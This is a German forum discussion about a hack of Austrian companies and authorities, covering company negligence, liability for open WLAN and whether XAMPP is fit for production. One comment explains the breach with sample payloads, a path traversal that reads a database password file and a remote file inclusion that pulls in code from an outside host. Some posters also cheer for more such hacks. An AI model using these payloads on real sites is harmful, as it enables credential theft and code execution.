[gelöscht]

[gelöscht]

burzum schrieb:
--------------------------------------------------------------------------------
> Das hier immer gleich die höchsten Ämter einschreiten. Wenn ich meine Karre
> nicht abschließe und am besten noch ein Schild "Klau mich!" dranhänge kommt
> auch nicht gleich das BKA mit einer Anti-Terror-Taskforce oder die
> IT-Abteilung des Bundes.


natürlich es ist absurd gegen hacker, die ganz offensichtlich ohne
böse absichten daten klauen und behörden oder firmen damit
politisch erpressen , gleich bundesbehörden einzusetzen.

was österreich angeht ist es aber so, dass im gegensatz zu den
meisten deutschen bundesländern der verfassungsschutz grundsätzlich
zuständig für die organisierte kriminalität ist, und online angriffe grösseren
ausmasses est mal als solche gewertet werden, weil das motiv der täter ja
noch niht bekannt ist, und man nicht wissen kann, dass es vielleicht nur ein
einzeltäter war.
die denken eben ernsthaft, für so etwas bräuchte es eine grössere organisation
bzw "täter"gruppe mit viel geld und vitamin B usw. :D


> Man sollte eher auch den Unternehmen von Staatswegen gleich noch eins
> reinwürgen für den fahrlässigen Umgang mit Daten. Passwörter im Klartext,
> XAMPP als Produktiv-Server...argh. Die sollen eher froh sein über den
> kostenlosen Security-Audit. Die Ursachen für die phösen Hacks war *immer*
> Schlamperei auf Firmen/Behördenseite.


leider ist das nur die halber wahrheit.

99% der datendiebstähle und einbrüche in europäischen firmen und
behörden werden immer noch von der chinesischen regierung und der
organisierten kriminalität ausgeführt - und nicht von hacker kiddies,
denen es um die sicherheit der daten geht.

deine kritik am ungang mit daten beim staat bleibt trotzdem — ja gerade
deswegen — richtig.


> Wir brauchen mehr solcher Hacks, so düster es auch sein mag für die
> Betroffenen, ohne öffentlichkeitswirksame Aktionen der Art würden die
> Konzerne und Ämter nie in Bewegung kommen. Und wenn sich Hansdepp auch
> endlich mal anfängt Gedanken um seine Daten zu spinnen, dann ist echt was
> gewonnen.

ich tendiere eher dazu, dass ich privatfirmen _nicht dabei helfen möchte,
gespeichterte daten immer sicherer aufzubewahren.

die meisten daten, die firmen speichern, haben sie sich ohnehin illegal
beschafft — und das halte ich für das grössere problem.

selbstverständlich gibt es ausnahmen: die kundendaten eines händlers
o.ä. datensätze, die kontodaten oder kreditkarten daten enthalten, müssen
sicher sein, und hier hilft so ein kleiner angriff sicher bei den betroffenen
firmen für mehr bewusstsein für datensicherheit.

wieso kann ein Privatbürger dafür angezeigt werden, wenn er sein WLAN nicht ausreichend gegen den Zugang dritter schützt - bekommt sogar eine Mitschuld wenn über seine Leitung ein Verbrechen / Hack stattfindet - ein Unternehmen ist aber des arme Haschal wenn es mal passiert

Unternehmen die Daten von Kunden erheben, keinerlei Sicherheitsmaßnahmen aufweisen, sollten aufs massivste dafür zur Rechenschaft gezogen werden. Verbrechen seitens der Hacker hin oder her und wenns Frau Lieschen Müller am Herd mitm iPhone war. Wer Daten erhebt, ist auch für deren Sicherheit zuständig.

Äpfel != Birnen

Zum. ziviler Rechtsanspruch besteht bei Schaden durch unsachgemäßen Umgang mit Daten durchaus. [1]
Wenn überhaupt muß man also differenzieren, ob hier im Einzelfall unterschiedliche Maßstäbe angelegt werden.
Strafrechtlich relevant ist es verm. nicht, weil von eher begrenzter Wirkung ausgegangen wird. (Was mitunter -s. Fratzenbuch- durchaus überdacht werden sollte/müßte)

Ein offenes WLAN ist an sich erst mal gar nicht justuziabel - weder Straf- noch Zivilrechtlich.
Zum Rechtsgegenstand wird es erst, wenn über das dahinterstehende Netzwerk eine zivil- oder strafrechtlich relevante Tat erfolgt.
Zunächsteinmal tritt (gerne) eine Beweislastumkehr ein: Du mußt nachweisen, daß die Handlung zwar über Dein Netzwerk, aber nicht durch Dich erfolgt ist (router log reicht zum. im Erstfall - kommt es häufiger vor, wirst Du Dich um um signierte logs kümmern müssen).

Darüber hinaus greift in D. auch noch das -sorry- kranke Modell der Störerhaftung [2] - was im Grunde ein Freischein ist, *irgendwen* zu belangen, der mit der eigentlich rel. Tat *irgendwie* in Verbindung zu bringen ist - auch wenn er eigentlich "Opfer" ist und das WLAN nur aufgrund seiner Unkenntnis zur Verfügung gestellt hat (und ihm möglicherweise schon dadurch ein Schaden entstanden ist - was im Flatratezeitalter natürlich passé ist)

[1] http://dejure.org/gesetze/BDSG/7.html, http://dejure.org/gesetze/BDSG/8.html
[2] http://www.schwarz-surfen.de/storerhaftung/

Als ich Xampp gelesen hatte dachte ich erst hier wird man verarscht.

Ein kommerzielle/offizielle Website mit Kundendaten ist nicht gleich ein Game-vServer... das ist schon ziemlich krank. Was für Volltrottel haben die dort beschäftigt???
Dann auch noch Terror.... und wieder "Experten" einzusetzen, ebenso.

Die haben mehr als nur ein Rad ab.

firehorse schrieb:
--------------------------------------------------------------------------------
> Ein kommerzielle/offizielle Website mit Kundendaten ist nicht gleich ein
> Game-vServer... das ist schon ziemlich krank. Was für Volltrottel haben die
> dort beschäftigt???

XAMPP ist und war nicht wirklich das Problem. XAMPP ist nicht sehr performant und ist eher in der Region "Quick and Dirty" zu finden. Das macht XAMPP aber eben nicht unsicherer sondern nur unwirtschaftlicher. Das Problem liegt und lag viel mehr in der Konfiguration und darin dass man über Jahre keine Updates an der Software vorgenommen hat.

Wenn jemand mit einer Windows XP Version ohne Updates im Internet zugange ist mit einem Admin-Account der "admin" heißt und kein oder nur ein sehr sehr schwaches Passwort hat, dann ist nicht unbedingte Windows XPs schuld wenn man gehackt wird.

Österreich != Deutschland

Auch wenn sich österreichische Rechtssprechung mitunter an deutscher anlehnt, seit 1945 ist Österreich von Deutschland unabhängig und hat eine entsprechend eigenständige Legislative.
Bitte das zur Kenntnis nehmen.

> XAMPP als Produktiv-Server...argh.
Muss man das nun verstehen? Xampp ist nur eine Ansammlung von Web-Diensten. Wenn man diesen entsprechend konfiguriert ist das kein Problem diesen als Produktiv-Server zu nutzen...natürlich nicht "out of the Box".

Ich verwende zwar kein XAMPP, aber ich denke, dass man darauf locker und ohne Vorkenntnisse ein sicheres Produktion-System hat.

Gut, bei MySQL ist es etwas problematischer, man sollte dem ROOT-User auf jeden Fall ein Kennwort verpassen - besser noch, den Root-Benutzer umbenennen in "root-1ajs28" oder sowas, um hijacking unterbinden zu können.

Aber sonst ist das System indes selbst sicher.

Wenn man dann natürlich in PHP eine Application entwickelt, mit der man über ?path=../../../db.inc.php sauber in Plaintext username + password findet + der MySQL-Server über eine externe IP erreichbar ist, dann braucht man sich nicht zu wundern, wenn dann mal unberechtigte Zugriff auf die komplette DB haben. Schön ist es noch, wenn man mit ?path=http://152.1.2.3/php-inject.sphp eigenen Code ausführen und anschließend z.B. die INDEX-Files ändern kann.

Wer XAMPP verurteilt verurteilt auch APT-GET und RPM. Denn was Anderes ist XAMPP auch nicht - nur eine Ansammlung von Paketen. (Korrigiert mich, wenn ich falsch liege.)

So ein Bullshit!
Xampp erhält keinerlei Patches für CVEs und die letzte Version ist von Januar...

Dadie schrieb:
--------------------------------------------------------------------------------
> XAMPP ist und war nicht wirklich das Problem. XAMPP ist nicht sehr
> performant und ist eher in der Region "Quick and Dirty" zu finden. Das
> macht XAMPP aber eben nicht unsicherer sondern nur unwirtschaftlicher. Das
> Problem liegt und lag viel mehr in der Konfiguration und darin dass man
> über Jahre keine Updates an der Software vorgenommen hat.
>
> Wenn jemand mit einer Windows XP Version ohne Updates im Internet zugange
> ist mit einem Admin-Account der "admin" heißt und kein oder nur ein sehr
> sehr schwaches Passwort hat, dann ist nicht unbedingte Windows XPs schuld
> wenn man gehackt wird.
>

Das ist leider völlig daneben.
Ein PW schützt dich nicht vor Sicherheitslücken. Und unter XP schon gar nicht vor denen die ab Werk eingebaut sind. Unter XP ist ein PW auch eigentlich nur als Sichtschutz brauchbar. Und als produktiver Server im Netz hat XP ohnehin nichts verloren und war auch nie dafür vorgesehen. Der Rest sollte eigentlich bekannt sein.

> Unternehmen die Daten von Kunden erheben, keinerlei Sicherheitsmaßnahmen aufweisen, sollten aufs massivste dafür zur Rechenschaft gezogen werden.

___

Die ganz grossen Wahrheiten sind EINFACH!

Wirkung und Gegenwirkung.
Variation und Selektion.
Wie im grossen, so im kleinen.

> Ohne öffentlichkeitswirksame Aktionen der Art würden die Konzerne und Ämter nie in Bewegung kommen.

> Wir brauchen mehr solcher Hacks

___

Die ganz grossen Wahrheiten sind EINFACH!

Wirkung und Gegenwirkung.
Variation und Selektion.
Wie im grossen, so im kleinen.